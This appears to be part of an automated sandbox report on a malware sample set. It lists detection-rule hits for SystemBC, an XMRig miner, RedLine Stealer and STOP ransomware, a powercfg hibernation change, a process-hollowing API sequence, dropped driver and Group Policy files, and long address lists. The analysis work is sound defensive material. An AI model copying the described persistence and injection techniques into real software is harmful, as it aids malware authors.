Source: 36.2.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.4dd2eb0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 36.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.983fa38.10.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.4dd2eb0.2.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 46.3.etzpikspwykg.exe.9f0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 46.3.etzpikspwykg.exe.9f0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 46.3.etzpikspwykg.exe.9f0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 46.3.etzpikspwykg.exe.9f0000.2.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 46.3.etzpikspwykg.exe.9f0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 46.3.etzpikspwykg.exe.9f0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000000A.00000002.2963054220.0000000000647000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000024.00000002.2468755517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects SystemBC Author: ditekSHen
Source: 0000002E.00000003.2200376468.00000000009F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000002E.00000003.2200376468.00000000009F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000002E.00000003.2200376468.00000000009F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: NjdbLPleIutA8FKI_S3fRztd.exe PID: 180, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown

Uses powercfg.exe to modify the power settings

Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe

Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe

Code function: 10_2_02000110 VirtualAlloc,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,

10_2_02000110

Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe

Code function: 9_2_00B59B68 CreateProcessAsUserW,

9_2_00B59B68

Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe

File created: C:\Windows\TEMP\yqyegvqciyid.sys

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Windows\System32\GroupPolicy\gpt.ini	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Windows\System32\GroupPolicy\Machine	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Windows\System32\GroupPolicy\User	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	File created: C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Code function: 7_2_004162A6	7_2_004162A6
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Code function: 7_2_0040E5A5	7_2_0040E5A5
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Code function: 7_2_004126B0	7_2_004126B0
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Code function: 7_2_00403A01	7_2_00403A01
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Code function: 7_2_00418EF1	7_2_00418EF1
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Code function: 7_2_00418FCB	7_2_00418FCB
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Code function: 8_2_0123DC34	8_2_0123DC34
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_008A9510	9_2_008A9510
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_008AB738	9_2_008AB738
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B528E0	9_2_00B528E0
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B54048	9_2_00B54048
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B5A100	9_2_00B5A100
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B58A98	9_2_00B58A98
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B54350	9_2_00B54350
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B54EB0	9_2_00B54EB0
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B528CF	9_2_00B528CF
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B54038	9_2_00B54038
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B50006	9_2_00B50006
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B53878	9_2_00B53878
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B53868	9_2_00B53868
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B50040	9_2_00B50040
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B5A9E8	9_2_00B5A9E8
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B53210	9_2_00B53210
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B53201	9_2_00B53201
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B56BA8	9_2_00B56BA8
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B56B98	9_2_00B56B98
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B52B80	9_2_00B52B80
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B52B70	9_2_00B52B70
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B54340	9_2_00B54340
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B58498	9_2_00B58498
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B58489	9_2_00B58489
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B57D68	9_2_00B57D68
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B57D58	9_2_00B57D58
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B54EA0	9_2_00B54EA0
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B5EF88	9_2_00B5EF88
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B5DF00	9_2_00B5DF00
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_00B57F61	9_2_00B57F61
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_05031D58	9_2_05031D58
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_0503CC89	9_2_0503CC89
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_0503CC98	9_2_0503CC98
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_0503B710	9_2_0503B710
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_073C1C70	9_2_073C1C70
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_073C1C59	9_2_073C1C59
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_07BF16F3	9_2_07BF16F3
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_07BFB660	9_2_07BFB660
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_07BFC560	9_2_07BFC560
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_07BF8958	9_2_07BF8958
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_07BFA558	9_2_07BFA558
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_07BFAC90	9_2_07BFAC90
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_07BFE300	9_2_07BFE300
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_07BF7290	9_2_07BF7290
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_07BFE670	9_2_07BFE670
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_07BFB650	9_2_07BFB650
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_07BF9928	9_2_07BF9928
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_07BF9917	9_2_07BF9917
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_07BF8949	9_2_07BF8949
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_07BFE8A8	9_2_07BFE8A8
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_07BFAC81	9_2_07BFAC81
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_07BFECD8	9_2_07BFECD8
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_07BFA4C9	9_2_07BFA4C9
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_07BFD408	9_2_07BFD408
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Code function: 9_2_07BFE000	9_2_07BFE000
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_00402C73	10_2_00402C73
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_02007220	10_2_02007220
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_020822C0	10_2_020822C0
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_0204E37C	10_2_0204E37C
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_02007393	10_2_02007393
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_0200B000	10_2_0200B000
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_0200A026	10_2_0200A026
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_0201F030	10_2_0201F030
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_0200B0B0	10_2_0200B0B0
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_020100D0	10_2_020100D0
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_020070E0	10_2_020070E0
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_020030F0	10_2_020030F0
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_02009120	10_2_02009120
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_0204E141	10_2_0204E141
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_0202D1A4	10_2_0202D1A4
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_0200A699	10_2_0200A699
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_0204B69F	10_2_0204B69F
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_0200E6E0	10_2_0200E6E0
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_0200C760	10_2_0200C760
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_0200A79A	10_2_0200A79A
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_0202D7F1	10_2_0202D7F1
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_02003520	10_2_02003520
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_02007520	10_2_02007520
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_0200CA10	10_2_0200CA10
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_02007A80	10_2_02007A80
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_02010B00	10_2_02010B00
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_02002B60	10_2_02002B60
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_0200DBE0	10_2_0200DBE0
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_02007880	10_2_02007880
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_020218D0	10_2_020218D0
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_0200A916	10_2_0200A916
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_0202E9A3	10_2_0202E9A3
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_0202F9B0	10_2_0202F9B0
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_020089D0	10_2_020089D0
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_020059F7	10_2_020059F7
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_02008E60	10_2_02008E60
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_02034E9F	10_2_02034E9F
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_02042D1E	10_2_02042D1E
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_02005DE7	10_2_02005DE7
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Code function: 10_2_02005DF7	10_2_02005DF7
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_01D93BD5	11_2_01D93BD5
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_01D93BE1	11_2_01D93BE1
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_01D93C90	11_2_01D93C90
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_01D94C5F	11_2_01D94C5F
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_01D93EE8	11_2_01D93EE8
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_03695338	11_2_03695338
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_03699171	11_2_03699171
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_0369B050	11_2_0369B050
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_03691BB8	11_2_03691BB8
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_03699AC8	11_2_03699AC8
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_03697C08	11_2_03697C08
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_0369EB18	11_2_0369EB18
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_03697BF9	11_2_03697BF9
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_03691BA8	11_2_03691BA8
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_03695B90	11_2_03695B90
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_03699AB7	11_2_03699AB7
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_036D0B98	11_2_036D0B98
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_036D0040	11_2_036D0040
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_036D0A60	11_2_036D0A60
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_036D3728	11_2_036D3728
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_036D15E9	11_2_036D15E9
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_036D15F8	11_2_036D15F8
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_036D4C4E	11_2_036D4C4E
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_036D1C58	11_2_036D1C58
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_05E11E48	11_2_05E11E48
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_05E11E39	11_2_05E11E39
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_05E979A8	11_2_05E979A8
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_05E95968	11_2_05E95968
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_05E9F138	11_2_05E9F138
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_05E98BA8	11_2_05E98BA8
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_05E9AA03	11_2_05E9AA03
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_05E986E0	11_2_05E986E0
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_05E986D0	11_2_05E986D0
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_05E993B4	11_2_05E993B4
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Code function: 11_2_05E98B98	11_2_05E98B98
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_015A3CD0	13_2_015A3CD0
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_015A3CC0	13_2_015A3CC0
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_015A3F28	13_2_015A3F28
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057AD56D	13_2_057AD56D
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057AA5D0	13_2_057AA5D0
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057A86E9	13_2_057A86E9
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057A7168	13_2_057A7168
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057A9040	13_2_057A9040
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057AEFF9	13_2_057AEFF9
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057A1BD0	13_2_057A1BD0
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057AE628	13_2_057AE628
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057A5160	13_2_057A5160
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057A4158	13_2_057A4158
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057A7159	13_2_057A7159
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057A5152	13_2_057A5152
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057A9030	13_2_057A9030
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057AE098	13_2_057AE098
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057A1BBF	13_2_057A1BBF
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057F7D00	13_2_057F7D00
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057FAC20	13_2_057FAC20
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057F5EF8	13_2_057F5EF8
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057F5EEA	13_2_057F5EEA
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057F8EB0	13_2_057F8EB0
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057F8EA0	13_2_057F8EA0
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057F89C0	13_2_057F89C0
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057F89B0	13_2_057F89B0
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057F0040	13_2_057F0040
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_057F0007	13_2_057F0007
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_058413D0	13_2_058413D0
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_05841DF3	13_2_05841DF3
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_05845486	13_2_05845486
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_05842490	13_2_05842490
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_05843F60	13_2_05843F60
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_05841298	13_2_05841298
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_05841E20	13_2_05841E20
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Code function: 13_2_05841E30	13_2_05841E30
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_02DBDDF0	14_2_02DBDDF0
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_02DB3F10	14_2_02DB3F10
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_02DB3F04	14_2_02DB3F04
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Code function: 14_2_02DB3CB8	14_2_02DB3CB8
